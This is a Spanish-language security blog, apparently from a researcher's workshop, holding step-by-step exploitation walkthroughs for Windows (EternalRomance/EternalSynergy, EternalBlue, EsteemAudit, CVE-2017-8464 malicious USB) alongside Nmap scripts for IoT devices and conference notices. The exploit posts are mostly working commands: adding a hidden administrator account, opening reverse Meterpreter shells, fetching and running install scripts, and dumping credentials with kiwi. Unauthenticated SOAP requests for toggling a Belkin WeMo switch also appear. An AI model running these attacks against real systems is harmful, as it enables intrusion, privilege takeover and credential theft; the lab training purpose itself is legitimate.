Explotación de vulnerabilidades recientes de Windows

Share
Publicado en Presentaciones | Deja un comentario

Explotando ETERNALROMANCE ETERNALSINERGY en Windows Server 2016

El exploit se encuentra en la popular base de datos de exploits: exploit-db. Es necesario
agregar una cuenta valida de cualquier nivel de permisos y el nombre de un PIPE.

1. Abrir firefox en la siguiente liga:
https://gist.github.com/hkm/

2. Click en el script “eternal-2016-install.sh” y descargarlo dando click en el boton [Raw] y seleccionen “Save Link As…” y luego el boton [Save].

3. Ejecuten el script con el siguiente comando:
root@kali:~# cd Downloads
root@kali:~/Downloads# sh eternal-2016-install.sh

4. Correr el script de nmap para obtener información remota del Windows 2016:
root@kali:~/Downloads# nmap -p445 -sC AQUÍELRANGO

5. En los resultados podemos VER que tiene la cuenta ‘guest’ habilitada:
account_used: guest
(apunten la IP que la utilizaremos en un momento)

5. Editamos el exploit para agregar el nombre de usuario ‘guest’:
root@kali:~/Downloads# nano 42315.py
Bajamos con las flechas hasta la parte de: Username = ”
Agregamos lo siguiente: Username = ‘guest’
Salimos del programa con CTRL+C y luego la tecla [y] para guardar.

6. Tenemos que buscar una named pipe de la máquina víctima con Metasploit:
root@kali:~/# msfconsole
msf 》 search pipe_auditor
msf 》 use auxiliary/scanner/smb/pipe_auditor
msf 》 set RHOSTS AQUÍLADIRECCIÓNIP
msf auxiliary(pipe_auditor) 》 run

7. Corremos el exploit de la siguiente manera:
python eternal-2016.py AQUÍLADIRECCIÓNIP AQUÍELPIPESIN/
(Esperamos que el exploit termine en “Done” si no lo hace,
probamos con otro nombre de Pipe)

8. Ahora que sabemos que funciona el exploit vamos a elevar privilegios de la cuenta guest a Administrador. Para eso
Cambiar la línea que inicia con ‘#service_exec…’ por las siguientes dos líneas:
service_exec(conn, r’cmd /c net user nuevoadmin /ADD /PASSWORDREQ:NO’)
service_exec(conn, r’cmd /c net localgroup administrators nuevoadmin /ADD’)

9. Utilizando smbexec.py podemos abrir una shell con la nueva cuenta:
root@kali:~# cd /usr/share/doc/python-impacket/examples
root@kali:/usr/share/doc/python-impacket/examples# python smbexec.py nuevacuenta@AQUÍLADIRECCIÓNIP

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Creando un USB malicioso con Microsoft Windows LNK Exploit: CVE-2017-8464

1. En Metasploit crea un HANDLER para recibir la conexión:

msf 》 use exploit/multi/handler
msf exploit(handler) 》 set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) 》 set LHOST TUDIRECCIÓNIP
msf exploit(handler) 》 run

2. Ahora utiliza el exploit cve_2017_8464_lnk_rce para crear los archivos:

msf exploit(handler) 》 use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) 》 set payload windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) 》 set LHOST TUDIRECCIÓNIP
msf exploit(cve_2017_8464_lnk_rce) 》 run

3. Esto te generará varios archivos. Copia los archivos al USB.

Inserta el USB a tu computadora.
En la parte superior en Places aparecera el nombre del USB, dale click para abrir el contenido.
Presiona CTRL-L para que en la barra de dirección de la ventana muestre la ubicación.
Copia la ubicación y pegala en el siguiente comando:

msf exploit(cve_2017_8464_lnk_rce) 》 cp /root/.msf4/local/FlashPlayer* “UBICACIÓNCOPIADA”

(son necesarias las comillas)

4. Ahora retira el USB e insertalo en la máquina virtual Windows 2016 x64

Para hacer esto puedes dar click izquierdo en en VMWARE en la parte inferior en el icono de disco y seleccionar Desconectar
Luego en tu Windows 2016 x64 seleccionas conectar en el mismo ícono y ya estara tu USB en esa máquina virtual.
Abre la carpeta que contiene los íconos.

Ahora mira de regreso tu HANDLER y podrás ver que una nueva sesión se conectó.

Para interactuar con la nueva sesión teclea:

msf exploit(cve_2017_8464_lnk_rce) 》 sessions -i 1

y luego:

meterpreter 》 shell

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Detectando y Explotando ETERNALBLUE en Windows 7 x64 con NMAP y Metasploit

Esta práctica consiste en utilizar el exploit ya incluido en Metasploit para
comprometer un Windows 7 de 64 bits.

1. Identifica en que rango está la máquina virtual desde Kali:
root@kali:~# ifconfig eth0
(el rango debe verse similar a 192.168.179.XXX)

2. Escanea la red e identifica la máquina virtual en el rango:
root@kali:~# nmap -O 192.168.179.*

3. Inicia la máquina Kali x86, abre la terminal e inicia Metasploit:
root@kali:~# msfconsole

4. Busca la ruta del exploit de ETERNALBLUE:
msf》 search eternal

5. Selecciona el exploit con el siguiente comando:
msf》 use exploits/windows/smb/ms17_010_eternalblue

6. Mira la información del exploit utilizando:
msf exploit(ms17_010_eternalblue) 》 show info

7. Pon la dirección IP del Windows7-x64:
msf exploit(ms17_010_eternalblue) 》 set RHOST AQUÍLADIRECCIÓNIP

8. Ejecuta el exploit:
msf exploit(ms17_010_eternalblue) 》 exploit

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Explotando EsteemAudit en Windows 2003 x86 con EsteemAudit-2.1.0.exe desde Metasploit

La práctica consiste en explotar un Windows 2003 x86 con los exploits filtrados de la NSA desde Metasploit. La práctica incluye la instalación del ejecutable original de EsteemAudit-2.1.0.exe.

1. Identifica en que rango esta la máquina virtual desde Kali:

root@kali:~# ifconfig eth0

(el rango debe verse similar a 192.168.179.XXX)

2. Escanea la red e identifica la máquina virtual en el rango:

root@kali:~# nmap -O 192.168.179.*

3. Instalando EsteemAudit-2.1.0.exe en Metasploit con mi script:

wget https://gist.githubusercontent.com/hkm/fe705e3ff9d0df3f6eaaafb44aeca4d6/raw/ce275bc93e0d54adbc5939142a960e092a85c501/esteemaudit-install.sh

3b. Si no pueden copiar la liga, entren a https://gist.github.com/hkm/ y den click derecho en el boton [Raw] y seleccionen “Save Link As…”

4. Ejecuten el archivo con los siguiente comando en el Terminal:

root@kali:~# sh esteemaudit-install.sh

5. Entramos a Metasploit:

root@kali:~# msfconsole

6. Busca la ruta del exploit de ESTEEMAUDIT:

msf》 search esteem

7. Selecciona el exploit con el siguiente comando:

msf》 use exploits/windows/rdp/esteemaudit

8. Mira la información del exploit utilizando:

msf exploit(esteemaudit) 》 show info

9. Pon la dirección IP del Windows2003-x86:

msf exploit(esteemaudit) 》 set RHOST AQUÍLADIRECCIÓNIP

10. Ejecuta el exploit:

msf exploit(esteemaudit) 》 exploit

11. Recibiremos una shell en forma de Meterpreter, para ver su información escribimos:

meterpreter 》 sysinfo

12. Cargamos el módulo kiwi para obtener credenciales:

meterpreter 》 load kiwi

13. Listamos las credenciales de la computadora:

meterpreter 》 creds_all

 

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Scripts para obtener información de Trane Trace SC HVAC

Par de scripts para obtener información y explotar vulnerabilidades en Trane Tracer SC, un panel inteligente utilizado para comunicación con controladores de equipo HVAC.

http-vuln-cve2016-0870.nse

Download: https://github.com/hkm/nmap-nse-scripts/blob/master/http-vuln-cve2016-0870.nse

Existe información sensible expuesta en la versión 4.20.1134 y anteriores en URLs como /evox/user/user/ La información expuesta corresponde al nombre de los administradores, correo, nombre de usuario, permisos, etc.
Esta vulnerabilidad puede ser la vulnerabildad ya reparada CVE-2016-0870 http://www.cvedetails.com/cve/CVE-2016-0870/ pero no se ha podido confirmar ya que no he tenido respuesta por parte del autor.

 

trane-info.nse

Download: https://github.com/hkm/nmap-nse-scripts/blob/master/trane-info.nse

En la versión 4.40.1211 y anteriores continua existiendo información expuesta en las URLS dentro de /evox/*, por ejemplo /evox/equipment e /evox/point la cuales no requieren autenticación.

– Información expuesta:
Version de producto, versión de kernel, dispositivos, valores de sensores, diagramas de sistemas, nombres de espacios donde estan instalados los sistemas, tipos de sistemas instalados, etc.

 

 

 

Share
Publicado en Exploits, Scripts Nmap, Software, Vulnerabilidades | Deja un comentario

Congreso Internacional de Seguridad Informática UANL 2017

CISI 2017

Participaré en el Congreso Internacional de Seguridad Informática organizado por la Facultad de Ciencias Físico Matemáticas y la Asociación Mexicana de Seguridad Informática. El congreso será inaugurado el día miércoles 30 de Agosto de 2017 a las 8:30 horas en el Auditorio de la Biblioteca Universitaria “Raúl Rangel Frías” ubicada en la Ave. Alfonso Reyres 4000.

 

En esta edición Roberto Salgado y Pedro Joaquín participarán impartiendo la conferencia “Un lobo disfrazado de oveja” y un taller y conferencia sobre explotación de vulnerabilidades recientes en Windows.

Sitio Oficial: http://cisi.fcfm.uanl.mx/

 

Share
Publicado en Congresos | Deja un comentario

Script para obtener información de Phillips Hue Bridge

Philips Hue Bridge

philipshue-info.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/philipshue-info.nse

El Philips Hue Bridge es un controlador de luces inteligentes. El script trane-info.nse muestra la información de modelo, versiones y dirección MAC obtenida del URL /api/config. No requiere autenticación. El URL no es mencionado en la documentación actual. Probado en la versión del API 1.19 el 5/7/2017.

Philips Hue Bridge

Share
Publicado en Investigaciones, Scripts Nmap, Software | Deja un comentario

Scripts de NMap para Belkin Wemo Smart Switch

El Belkin WeMo Switch es un contacto eléctrico que puede ser controlado desde la red local. La versión actual del firmware (WeMo_WW_2.00.10966.PVT-OWRT-SNS) no requiere autenticación para prender o apagar el contacto eléctrico o para obtener información de las redes inalámbricas cercanas.

 

wemo-info.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-info.nse

El script wemo-info.nse permite obtener información acerca del dispositivo y las redes inalámbricas cercanas. Utiliza un archivo XML y un servicio de la interfaz web localizada entre los puertos 49152 a 49154. El XML localizado en el URL /setup.xml contiene información acerca del dispositivo. La información sobre las redes inalámbricas cercanas la obtiene realizando una petición SOAP a /upnp/control/WiFiSetup1 con el método GetApList.

 

Petición:

POST /upnp/control/WiFiSetup1 HTTP/1.0
Host: 192.168.1.80
Content-Type: text/xml
Content-Length: 239
SOAPACTION: "urn:Belkin:service:WiFiSetup1:1#GetApList"


<?xml ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetApList xmlns:u="urn:Belkin:service:WiFiSetup1:1">
</u:GetApList>
</s:Body>
</s:Envelope>

Respuesta:

HTTP/1.0 200 OK
CONTENT-LENGTH: 493
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Thu, 22 Jun 2017 17:01:01 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>
<u:GetApListResponse xmlns:u="urn:Belkin:service:WiFiSetup:1">
<ApList>Page:1/1/6$
INFINITUM|1|24|WPA1PSKWPA2PSK/TKIPAES,
INFINITUMu|5|0|WPA1PSKWPA2PSK/TKIPAES,
INFINITUM|6|0|WPA2PSK/AES,
INFINITUM|6|20|WEP,
INFINITUM|8|29|WPA2PSK/AES,
INFINITUM|10|10|WPA1PSKWPA2PSK/TKIPAES,
</ApList>
</u:GetApListResponse>
</s:Body> </s:Envelope>

wemo-switch.nse
Download: https://github.com/hkm/nmap-nse-scripts/blob/master/wemo-switch.nse

El script wemo-switch.nse prende o apaga el dispositivo conectado al Belkin WeMo Switch. Realiza una petición SOAP a /upnp/control/basicevent1 con el método SetBinaryState.

 

Petición:

POST /upnp/control/basicevent1 HTTP/1.0
Content-Type: text/xml; charset="utf-8"
HOST: 192.168.1.80
Content-Length: 316
SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState"
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetBinaryState xmlns:u="urn:Belkin:service:basicevent1:1">
<BinaryState>1</BinaryState>
</u:SetBinaryState>
</s:Body>
</s:Envelope>

Respuesta:

HTTP/1.0 200 OK
CONTENT-LENGTH: 376
CONTENT-TYPE: text/xml; charset="utf-8"
DATE: Thu, 22 Jun 2017 17:52:02 GMT
EXT:
SERVER: Unspecified, UPnP/1.0, Unspecified
X-User-Agent: redsonic

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>
<u:SetBinaryStateResponse xmlns:u="urn:Belkin:service:basicevent:1">
<BinaryState>1</BinaryState>
<CountdownEndTime>0</CountdownEndTime>
<deviceCurrentTime>1498153922</deviceCurrentTime>
</u:SetBinaryStateResponse>
</s:Body> </s:Envelope>

 

 

Share
Publicado en Exploits, Investigaciones, Scripts Nmap, Software, Videos, Vulnerabilidades | Deja un comentario

OWASP Latam Tour 2017 Riviera Maya

El OWASP LATAM Tour 2017 es un evento de seguridad que reune a expertos en materia de seguridad web y de aplicaciones. El evento se llevará a cabo el día 22 de abril en Tech Garage Cancún y no tendrá costo alguno para los asistentes.

Links oficiales:

Sitio oficial de OWASP LATAM Tour 2017
OWASP LATAM Tour 2017 en la Riviera Maya
Call For Papers – OWASP LATAM Tour 2017 Riviera Maya
Call For Sponsors – OWASP LATAM Tour 2017 Riviera Maya
OWASP Riviera Maya

Share
Publicado en Congresos, OWASP Riviera | Deja un comentario